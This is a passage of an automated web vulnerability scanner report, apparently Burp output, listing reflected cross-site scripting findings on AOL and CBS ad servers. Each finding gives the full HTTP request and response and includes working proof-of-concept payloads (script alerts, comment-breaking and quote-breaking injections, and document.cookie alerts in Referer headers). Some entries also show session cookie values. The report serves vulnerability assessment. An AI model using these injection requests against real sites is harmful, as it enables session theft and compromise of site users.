GET /learn.jsaa475<script>alert(1)</script>947c52ed946?namespace=bgsmth&partial=db8be26461d3c04c280076f8a2511da299dbe425&callback=learn_cb HTTP/1.1
Host: learn2.aol.com
Proxy-Connection: keep-alive
Referer: http://www.gadling.com/?d7f2b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eab70c602dd2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; bandType=broadband; s_pers=%20s_getnr%3D1297023688615-Repeat%7C1360095688615%3B%20s_nrgvo%3DRepeat%7C1360095688616%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Content-Type: text/plain
ntCoent-Length: 145
X-Response-Time: 0ms
Date: Sun, 06 Feb 2011 20:41:46 GMT
Connection: keep-alive
Content-Length: 145

Cannot GET /learn.jsaa475<script>alert(1)</script>947c52ed946?namespace=bgsmth&partial=db8be26461d3c04c280076f8a2511da299dbe425&callback=learn_cb

1.123. http://learn2.aol.com/learn.js [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn2.aol.com
Path:   /learn.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 96580<script>alert(1)</script>baa2a9fd9f7 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /learn.js?namespace=bgsmth&partial=db8be26461d3c04c280076f8a2511da299dbe425&callback=learn_cb96580<script>alert(1)</script>baa2a9fd9f7 HTTP/1.1
Host: learn2.aol.com
Proxy-Connection: keep-alive
Referer: http://www.gadling.com/?d7f2b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eab70c602dd2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; bandType=broadband; s_pers=%20s_getnr%3D1297023688615-Repeat%7C1360095688615%3B%20s_nrgvo%3DRepeat%7C1360095688616%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Cache-Control: max-age=0, no-store, must-revalidate
ntCoent-Length: 94
X-Response-Time: 2ms
Date: Sun, 06 Feb 2011 20:41:44 GMT
Set-Cookie: learnkey=2e5503fcd7522e879beca62d0fd2d6ff
Connection: keep-alive
Content-Length: 94

learn_cb96580<script>alert(1)</script>baa2a9fd9f7({"error":"Insert + Update failed, retry."});

1.124. http://mads.cbs.com/mac-ad [ADREQ&SP parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the ADREQ&SP request parameter is copied into the HTML document as plain text between tags. The payload 3cf3a<a>c5232a83a81 was submitted in the ADREQ&SP parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=803cf3a<a>c5232a83a81&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:36:09 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:36:09 GMT
Content-Length: 609

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=803cf3a<a>c5232a83a81&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='803352328381' CNET-PTYPE='6711' POS='100' NCAT='19650:19806:' CNET-PARTNER-ID='1' DVAR_
...[SNIP]...

1.125. http://mads.cbs.com/mac-ad [ADREQ&beacon parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload fc4eb<a>1f38f7daa6b was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=72427910&ADREQ&beacon=1fc4eb<a>1f38f7daa6b&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404; CBS_ADV_VAL=b%3Bbc%3Dtrue; _PACIFIC_COMMENTS=Ad+System+Call%28ocp.cbs.com%29%3A+http%3A%2F%2Fad.doubleclick.net%2Fad%2Fcan%2Fcbs%2Fp8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y%3Bsite%3Dentertainment%3Bdpart%3Dprimetime%3Bshow%3Dbigbangtheory%3Bfeat%3Dfull_episodes%3Bfeat%3Drebroadcast%3Bpartner%3Dcbs%3Bvid%3D1777408650%3Boutlet%3DCBS%2520Production%3Bpid%3D8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y%3BnoAd%3D%3Btype%3Dros%3Bformat%3DMPEG4%3Blength%3D1300300%3Bpos%3D1%3Bsz%3D320x240%3BplayerVersion%3DUVP2.7.1%3BClipLength%3DlongFormat%3Badv%3Db%3Bbc%3Dtrue%3Bord%3D64391%3F; PACIFIC_TRACE=c13-ad-xw1.cnet.com.12970243494080.7474704464438863; CBS_CAT_EXCL=1%3A

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:39:44 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:39:44 GMT
Content-Length: 497

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=72427910&ADREQ&beacon=1fc4eb<a>1f38f7daa6b&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='1413876' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw9.cnet.com::1566353728 2
...[SNIP]...

1.126. http://mads.cbs.com/mac-ad [BRAND parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa822'%3balert(1)//7c0ff5d4906 was submitted in the BRAND parameter. This input was echoed as fa822';alert(1)//7c0ff5d4906 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57fa822'%3balert(1)//7c0ff5d4906&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:34:49 GMT
Server: Apache/2.2
Content-Length: 1176
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:34:49 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57fa822'%3balert(1)//7c0ff5d4906&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE
...[SNIP]...
<img alt="" height="0" src="http://adlog.com.com/adlog/i/r=15150&amp;sg=1815&amp;o=19650%253a19806%253a&amp;h=cn&amp;p=2&amp;b=57fa822';alert(1)//7c0ff5d4906&amp;l=en_US&amp;site=164&amp;pt=6711&amp;nd=19806&amp;pid=&amp;cid=&amp;pp=100&amp;e=&amp;rqid=00c13-ad-e6:4D4EFAF8CFEA5&amp;orh=cbs.com&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=ww
...[SNIP]...

1.127. http://mads.cbs.com/mac-ad [BRAND parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into the HTML document as plain text between tags. The payload 6afe3<a>ee014234579 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=576afe3<a>ee014234579&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:35:43 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:35:43 GMT
Content-Length: 626

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=576afe3<a>ee014234579&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAP
...[SNIP]...

1.128. http://mads.cbs.com/mac-ad [BRAND parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript inline comment. The payload 26971*/alert(1)//df28e5b63e6 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=5726971*/alert(1)//df28e5b63e6&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:34:51 GMT
Server: Apache/2.2
Content-Length: 1175
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:34:51 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=5726971*/alert(1)//df28e5b63e6&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.129. http://mads.cbs.com/mac-ad [CELT parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload 35ae0<a>44ed3893763 was submitted in the CELT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js35ae0<a>44ed3893763&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:33:34 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:33:34 GMT
Content-Length: 543

<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js35ae0<a>44ed3893763&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" -
...[SNIP]...

1.130. http://mads.cbs.com/mac-ad [DVAR_GENRE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the DVAR_GENRE request parameter is copied into a JavaScript inline comment. The payload 4b426*/alert(1)//1050a777b41 was submitted in the DVAR_GENRE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy4b426*/alert(1)//1050a777b41&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:35:17 GMT
Server: Apache/2.2
Content-Length: 1189
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:35:17 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy4b426*/alert(1)//1050a777b41&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.131. http://mads.cbs.com/mac-ad [DVAR_GENRE parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the DVAR_GENRE request parameter is copied into the HTML document as plain text between tags. The payload 6377c<a>3fffe363d11 was submitted in the DVAR_GENRE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy6377c<a>3fffe363d11&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:36:35 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:36:35 GMT
Content-Length: 601

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy6377c<a>3fffe363d11&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164'
...[SNIP]...

1.132. http://mads.cbs.com/mac-ad [DVAR_INSTLANG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the DVAR_INSTLANG request parameter is copied into a JavaScript inline comment. The payload 95bb9*/alert(1)//5a7288748bb was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US95bb9*/alert(1)//5a7288748bb&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:36:05 GMT
Server: Apache/2.2
Content-Length: 1189
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:36:05 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US95bb9*/alert(1)//5a7288748bb&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.133. http://mads.cbs.com/mac-ad [DVAR_INSTLANG parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the DVAR_INSTLANG request parameter is copied into the HTML document as plain text between tags. The payload 45b84<a>3f59d2a0e54 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US45b84<a>3f59d2a0e54&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:38:09 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:38:09 GMT
Content-Length: 602

